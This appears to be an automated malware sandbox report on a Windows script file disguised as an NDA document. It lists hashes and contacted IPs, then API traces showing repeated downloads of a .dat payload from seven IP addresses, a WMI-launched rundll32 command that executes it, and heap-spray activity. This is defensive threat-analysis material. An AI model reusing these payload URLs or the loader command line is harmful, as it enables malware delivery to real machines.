Summary | ZeroBOX

NDA_D753_May_10.wsf

Category FILE
Machine s1_win7_x6402
Started May 11, 2023, 9:16 a.m.
Completed May 11, 2023, 9:18 a.m.
Size 37.6KB
Type UTF-8 Unicode text, with very long lines, with CRLF, LF line terminators
MD5 8624646d76bcbcc599c9321fb06cddd1
SHA256 4f0f597046a24c165dd54f35dd5ef818d3c6961890923ebb268616931d5ba8d4
CRC32 B43EB40C
ssdeep 768:qN16gyU9bTCVw0TaKCwcbTuinOKsnnWpyTvTlhkehECw4tGtW3NlhkehER9:qN16gR+Vw0WZLEJWp4vTlDhvAtW3NlDu
Yara None matched

Name Response Post-Analysis Lookup
No hosts contacted.
IP Address Status Action
144.208.127.242 Active Moloch
149.102.225.18 Active Moloch
164.124.101.2 Active Moloch
207.148.14.105 Active Moloch
45.155.37.101 Active Moloch
5.42.221.144 Active Moloch
91.193.16.139 Active Moloch

Suricata Alerts

No Suricata Alerts

Suricata TLS

No Suricata TLS

Time & API Arguments Status Return Repeated

GetComputerNameW

computer_name: TEST22-PC
Status 1, Return 1, Repeated 0
suspicious_features Connection to IP address
suspicious_request GET http://207.148.14.105/a3hdJG9pj.dat
suspicious_features Connection to IP address
suspicious_request GET http://149.102.225.18/a3hdJG9pj.dat
request GET http://207.148.14.105/a3hdJG9pj.dat
request GET http://149.102.225.18/a3hdJG9pj.dat
host 144.208.127.242
host 149.102.225.18
host 207.148.14.105
host 45.155.37.101
host 5.42.221.144
host 91.193.16.139
Time & API Arguments Status Return Repeated

InternetCrackUrlW

url: http://45.155.37.101/a3hdJG9pj.dat
flags: 0
Status 1, Return 1, Repeated 0

HttpOpenRequestW

connect_handle: 0x00cc0008
http_version:
flags: 4194304
http_method: GET
referer:
path: /a3hdJG9pj.dat
Status 1, Return 13369356, Repeated 0

InternetCrackUrlW

url: http://5.42.221.144/a3hdJG9pj.dat
flags: 0
Status 1, Return 1, Repeated 0

HttpOpenRequestW

connect_handle: 0x00cc0008
http_version:
flags: 4194304
http_method: GET
referer:
path: /a3hdJG9pj.dat
Status 1, Return 13369356, Repeated 0

InternetCrackUrlW

url: http://91.193.16.139/a3hdJG9pj.dat
flags: 0
Status 1, Return 1, Repeated 0

HttpOpenRequestW

connect_handle: 0x00cc0008
http_version:
flags: 4194304
http_method: GET
referer:
path: /a3hdJG9pj.dat
Status 1, Return 13369356, Repeated 0

InternetCrackUrlW

url: http://144.208.127.242/a3hdJG9pj.dat
flags: 0
Status 1, Return 1, Repeated 0

HttpOpenRequestW

connect_handle: 0x00cc0008
http_version:
flags: 4194304
http_method: GET
referer:
path: /a3hdJG9pj.dat
Status 1, Return 13369356, Repeated 0

InternetCrackUrlW

url: http://207.148.14.105/a3hdJG9pj.dat
flags: 0
Status 1, Return 1, Repeated 0

HttpOpenRequestW

connect_handle: 0x00cc0008
http_version:
flags: 4194304
http_method: GET
referer:
path: /a3hdJG9pj.dat
Status 1, Return 13369356, Repeated 0

InternetReadFile

buffer: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL was not found on this server.</p> </body></html>
request_handle: 0x00cc000c
Status 1, Return 1, Repeated 0

InternetCrackUrlW

url: http://149.102.225.18/a3hdJG9pj.dat
flags: 0
Status 1, Return 1, Repeated 0

HttpOpenRequestW

connect_handle: 0x00cc0008
http_version:
flags: 4194304
http_method: GET
referer:
path: /a3hdJG9pj.dat
Status 1, Return 13369356, Repeated 0

InternetReadFile

buffer: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL was not found on this server.</p> </body></html>
request_handle: 0x00cc000c
Status 1, Return 1, Repeated 0
Time & API Arguments Status Return Repeated

InternetCrackUrlW

url: http://45.155.37.101/a3hdJG9pj.dat
flags: 0
Status 1, Return 1, Repeated 0

HttpOpenRequestW

connect_handle: 0x00cc0008
http_version:
flags: 4194304
http_method: GET
referer:
path: /a3hdJG9pj.dat
Status 1, Return 13369356, Repeated 0

send

buffer: !
socket: 856
sent: 1
Status 1, Return 1, Repeated 0

InternetCrackUrlW

url: http://5.42.221.144/a3hdJG9pj.dat
flags: 0
Status 1, Return 1, Repeated 0

HttpOpenRequestW

connect_handle: 0x00cc0008
http_version:
flags: 4194304
http_method: GET
referer:
path: /a3hdJG9pj.dat
Status 1, Return 13369356, Repeated 0

send

buffer: !
socket: 856
sent: 1
Status 1, Return 1, Repeated 0

InternetCrackUrlW

url: http://91.193.16.139/a3hdJG9pj.dat
flags: 0
Status 1, Return 1, Repeated 0

HttpOpenRequestW

connect_handle: 0x00cc0008
http_version:
flags: 4194304
http_method: GET
referer:
path: /a3hdJG9pj.dat
Status 1, Return 13369356, Repeated 0

send

buffer: !
socket: 856
sent: 1
Status 1, Return 1, Repeated 0

InternetCrackUrlW

url: http://144.208.127.242/a3hdJG9pj.dat
flags: 0
Status 1, Return 1, Repeated 0

HttpOpenRequestW

connect_handle: 0x00cc0008
http_version:
flags: 4194304
http_method: GET
referer:
path: /a3hdJG9pj.dat
Status 1, Return 13369356, Repeated 0

send

buffer: !
socket: 856
sent: 1
Status 1, Return 1, Repeated 0

InternetCrackUrlW

url: http://207.148.14.105/a3hdJG9pj.dat
flags: 0
Status 1, Return 1, Repeated 0

HttpOpenRequestW

connect_handle: 0x00cc0008
http_version:
flags: 4194304
http_method: GET
referer:
path: /a3hdJG9pj.dat
Status 1, Return 13369356, Repeated 0

send

buffer: !
socket: 856
sent: 1
Status 1, Return 1, Repeated 0

send

buffer: GET /a3hdJG9pj.dat HTTP/1.1 Accept: */* Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E; InfoPath.3; MARKANYEPS#25118) Host: 207.148.14.105 Connection: Keep-Alive
socket: 480
sent: 323
Status 1, Return 323, Repeated 0

send

buffer: !
socket: 856
sent: 1
Status 1, Return 1, Repeated 0

InternetCrackUrlW

url: http://149.102.225.18/a3hdJG9pj.dat
flags: 0
Status 1, Return 1, Repeated 0

HttpOpenRequestW

connect_handle: 0x00cc0008
http_version:
flags: 4194304
http_method: GET
referer:
path: /a3hdJG9pj.dat
Status 1, Return 13369356, Repeated 0

send

buffer: !
socket: 856
sent: 1
Status 1, Return 1, Repeated 0

send

buffer: GET /a3hdJG9pj.dat HTTP/1.1 Accept: */* Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E; InfoPath.3; MARKANYEPS#25118) Host: 149.102.225.18 Connection: Keep-Alive
socket: 972
sent: 323
Status 1, Return 323, Repeated 0

send

buffer: !
socket: 856
sent: 1
Status 1, Return 1, Repeated 0
Time & API Arguments Status Return Repeated

IWbemServices_ExecMethod

inargs.CurrentDirectory: None
inargs.CommandLine: conhost.exe rundll32 C:\Users\Public\aR4lIkC56t.dat,print
inargs.ProcessStartupInformation: None
outargs.ProcessId: 2080
outargs.ReturnValue: 0
flags: 0
method: Create
class: Win32_Process
Status 1, Return 0, Repeated 0
count 2032 name heapspray process wscript.exe total_mb 182 length 94208 protection PAGE_READWRITE
count 2035 name heapspray process wscript.exe total_mb 143 length 73728 protection PAGE_READWRITE
count 5083 name heapspray process wscript.exe total_mb 218 length 45056 protection PAGE_READWRITE
count 1017 name heapspray process wscript.exe total_mb 146 length 151552 protection PAGE_READWRITE
count 13414 name heapspray process wscript.exe total_mb 157 length 12288 protection PAGE_READWRITE
count 5061 name heapspray process wscript.exe total_mb 177 length 36864 protection PAGE_READWRITE
count 3813 name heapspray process wscript.exe total_mb 59 length 16384 protection PAGE_READWRITE
count 3050 name heapspray process wscript.exe total_mb 178 length 61440 protection PAGE_READWRITE
count 3048 name heapspray process wscript.exe total_mb 119 length 40960 protection PAGE_READWRITE
count 2033 name heapspray process wscript.exe total_mb 166 length 86016 protection PAGE_READWRITE
count 2011 name heapspray process wscript.exe total_mb 125 length 65536 protection PAGE_READWRITE
count 1016 name heapspray process wscript.exe total_mb 130 length 135168 protection PAGE_READWRITE
count 1019 name heapspray process wscript.exe total_mb 107 length 110592 protection PAGE_READWRITE
count 1017 name heapspray process wscript.exe total_mb 87 length 90112 protection PAGE_READWRITE
count 20828 name heapspray process wscript.exe total_mb 81 length 4096 protection PAGE_READWRITE
count 16255 name heapspray process wscript.exe total_mb 825 length 53248 protection PAGE_READWRITE
count 3030 name heapspray process wscript.exe total_mb 165 length 57344 protection PAGE_READWRITE
count 4051 name heapspray process wscript.exe total_mb 126 length 32768 protection PAGE_READWRITE
count 5083 name heapspray process wscript.exe total_mb 377 length 77824 protection PAGE_READWRITE
count 1016 name heapspray process wscript.exe total_mb 99 length 102400 protection PAGE_READWRITE
count 12414 name heapspray process wscript.exe total_mb 242 length 20480 protection PAGE_READWRITE
count 4324 name heapspray process wscript.exe total_mb 101 length 24576 protection PAGE_READWRITE
count 3054 name heapspray process wscript.exe total_mb 202 length 69632 protection PAGE_READWRITE
count 4042 name heapspray process wscript.exe total_mb 189 length 49152 protection PAGE_READWRITE
dead_host 5.42.221.144:80
dead_host 91.193.16.139:80
dead_host 45.155.37.101:80
dead_host 144.208.127.242:80